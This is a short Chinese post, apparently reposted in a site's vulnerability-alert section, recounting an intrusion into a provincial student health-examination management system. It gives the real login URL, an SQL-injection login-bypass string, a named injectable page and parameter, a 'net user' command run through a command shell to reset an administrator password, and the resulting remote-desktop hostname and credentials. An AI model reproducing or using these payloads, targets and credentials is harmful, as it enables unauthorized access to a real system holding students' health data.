某省学生健康体检信息管理系统SQL注入导致服务器沦陷下载

http://www.sdjktj.com/jktj/login.aspx

一个登陆页面

用户名 admin

密码用 ')or('a'='a 进行登陆 看图

注射点 http://www.sdjktj.com/jktj/Checksearch/Jkbgf.aspx?checkId=2456859

高权限的注射点

经过查看 3389端口是开放的

但是远程加用户貌似很困难 通过cmd shell 我改了一个正在登陆的用户的密码
命令如右边 net user administrator04 ad456dddd. 远程桌面计算机登陆 sdjktj.com


远程计算机 sdjktj.com
用户名 administrator04 密码:ad456dddd.

顺利登陆了 附带一个多站沦陷的图

当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细